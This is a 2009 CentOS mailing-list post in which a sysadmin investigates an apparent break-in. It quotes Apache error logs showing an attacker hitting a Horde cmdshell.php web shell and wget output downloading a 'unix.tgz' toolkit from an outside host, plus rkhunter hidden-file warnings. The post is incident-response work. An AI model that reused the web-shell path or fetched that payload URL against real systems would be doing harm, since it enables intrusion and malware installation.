Re: Centos 5.3 -> Apache - Under Attack ? Oh hell....

Linux Advocate <linuxhousedn@xxxxxxxxx> · Sat, 13 Jun 2009 22:37:08 -0700 (PDT)

replies below...

----- Original Message ----> From: Filipe Brandenburger <filbranden@xxxxxxxxx>> To: CentOS mailing list <centos@xxxxxxxxxx>> Sent: Saturday, June 13, 2009 9:58:51 PM> Subject: Re:  Centos 5.3 -> Apache - Under Attack ? Oh hell....
> > I suggest you start by looking at Apache's logs, 
Filipe, good idea. will do.
>look for very strange> URLs hat have nothing to do with the applications you have there, like> .exe files (IIS attacks) or other .cgi or .php files that will give> you 404 errors. Also look for things in the error_log file. And then> look for other accesses from the same IP (assuming it's always from> the same IP) to files that do exist, this will probably lead you to> what was used to break in. Continue the investigation from there.
A.  I have found  susicious ip around the dates ( based on the dates of files in the atack folder) when i think this break-in could hv hapened
86.126.71.74 <--- frm romania ( i am in singapore )
This ip seemed to have generated the most error messages. they are other not-frm-country IPs but way way less errors frm them.
They are many error messages (generated by 86.126.71.74) in the apache error log as below;
[Mon May 18 05:39:39 2009] [error] [client 86.126.71.74] PHP Warning:  Cannot modify header information - headers already sent in Unknown on line 0, referer: http://ip.of.machine.i.removed.for.this.post/horde/admin/cmdshell.php./x: line 19: log: No such file or directory
[Tue May 19 02:27:32 2009] [error] [client 86.126.71.74] PHP Warning:  Cannot modify header information - headers already sent in Unknown on line 0, referer: http://60.54.174.146/horde/admin/cmdshell.php?Horde=e20jlll1ds0eudvsdqrsrbb7c2
[Thu May 21 19:29:52 2009] [error] [client 80.179.16.201] script '/var/www/html/sys_to_server.php' not found or unable to stat
 http://60.54.174.146/horde/admin/cmdshell.php?Horde=f49bd7r2sb0ut885k3t5vq0ns0cat: vuln.txt: No such file or directory  
  <--- this vuln.txt is in the /dev/shm/unix/atack folder and also in the /var/tmp/unix/atack folder. Was the atacker looking for this file and then plant it later? or something like that ?

[Wed May 27 12:20:28 2009] [error] [client 86.126.71.74] PHP Warning:  Cannot modify header information - headers already sent in Unknown on line 0, referer: http://60.54.174.146/horde/admin/cmdshell.phpLen 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256Len 255 < 256

What does Len 255 < 256 indicate? Some kind of buffer overflow?
B .Can i conclude that the attacker  came through the   horde framework ( cmdshell.php) ? The horde framework was  installed from the centos repo.....!!!
[root@fwg]# yum info horde
Name       : hordeArch       : noarchVersion    : 3.1.7Release    : 1.el5.centosSize       : 18 MRepo       : installedSummary    : The common Horde Framework for all Horde modules.URL        : http://www.horde.org/
There are some google hits on cmdshell.php being used to execute arbitrary commands? There is some exploit called "CmdShell.Horde.ExploitCheck.Decoy"i havent found more info yet. Any tips on this would be most welcome. 

There is also this line in the error log;
[Fri May 22 18:26:56 2009] [notice] SELinux policy enabled; httpd running as context system_u:system_r:httpd_t

Is the line above normal?

C. BUT THE WORST THING OF ALL IS THESE LINES BELOW....
Mon May 25 14:46:50 2009] [error] [client 86.126.71.74] PHP Warning:  Cannot modify header information - headers already sent in Unknown on line 0, referer: http://my.machine.ip.again/horde/admin/cmdshell.php?Horde=7blkurngfdeqsgorrkqobldem7--14:47:00--  http://mv.do.am/unix.tgzRezolvare mv.do.am... 208.100.61.101Connecting to mv.do.am|208.100.61.101|:80... conectat.Cerere HTTP trimisă, se aşteaptă răspuns... 200 OKDimensiune: 1614224 (1,5M) [application/octet-stream]Saving to: `unix.tgz'
     0K .......... .......... .......... .......... ..........  3% 17,6K 87s    50K .......... .......... .......... .......... ..........  6% 33,7K 64s   100K .......... .......... .......... .......... ..........  9% 33,5K 55s   150K .......... .......... .......... .......... .......... 12% 45,6K 48s   200K .......... .......... .......... .......... .......... 15% 52,8K 42s   250K .......... .......... .......... .......... .......... 19% 50,3K 38s   300K .......... .......... .......... .......... .......... 22% 47,9K 35s   350K .......... .......... .......... .......... .......... 25% 54,8K 32s   400K .......... .......... .......... .......... .......... 28% 48,7K 30s   450K .......... .......... .......... .......... .......... 31% 36,9K 28s   500K .......... .......... .......... .......... .......... 34% 34,6K 27s   550K .......... .......... .......... .......... .......... 38% 32,9K 26s   600K .......... .......... .......... .......... .......... 41% 28,4K 26s   650K .......... .......... .......... .......... .......... 44% 36,7K 24s   700K .......... .......... .......... .......... .......... 47% 34,3K 23s   750K .......... .......... .......... .......... .......... 50% 34,0K 22s   800K .......... .......... .......... .......... .......... 53% 33,1K 20s   850K .......... .......... .......... .......... .......... 57% 47,7K 19s   900K .......... .......... .......... .......... .......... 60% 27,4K 18s   950K .......... .......... .......... .......... .......... 63% 13,0K 18s  1000K .......... .......... .......... .......... .......... 66% 28,3K 16s 1050K .......... .......... .......... .......... .......... 69% 38,1K 15s  1100K .......... .......... .......... .......... .......... 72% 29,3K 13s  1150K .......... .......... .......... .......... .......... 76% 44,1K 11s  1200K .......... .......... .......... .......... .......... 79% 56,6K 10s  1250K .......... .......... .......... .......... .......... 82% 44,7K 8s  1300K .......... .......... .......... .......... .......... 85% 39,8K 7s  1350K .......... .......... .......... .......... .......... 88% 50,8K 5s  1400K .......... .......... .......... .......... .......... 91% 40,2K 4s  1450K .......... .......... .......... .......... .......... 95% 37,3K 2s  1500K .......... .......... .......... .......... .......... 98% 43,1K 1s  1550K .......... .......... ......                          100% 44,5K=45s
14:47:47 (35,1 KB/s) - `unix.tgz' saved [1614224/1614224]

DID THIS GUY ACTUALLY SAVE A FILE ON MY HARD DISK??? AAAAAAHHHHHHHHHHHHHHHHHHHH???????????????
Was this why rkhunter popped out with this warning?
* Filesystem checks   Checking /dev for suspicious files...                      [ OK ]   Scanning for hidden files...                               [ Warning! ]---------------/etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev---------------Please inspect:  /usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression)  /dev/.udev (directory)
Should i delete these files? are the man files nromally .gz or .bz2 ?
There is also a similar entry, where another file called unix2.tgz was downloaded....
But i cant find these files on the HDisk?guys i am out of my league here. All assistance is deeply appreciated.

> > HTH,> Filipe> _______________________________________________> CentOS mailing list> CentOS@xxxxxxxxxx> http://lists.centos.org/mailman/listinfo/centos

      _______________________________________________CentOS mailing listCentOS@xxxxxxxxxxxxxx://lists.centos.org/mailman/listinfo/centos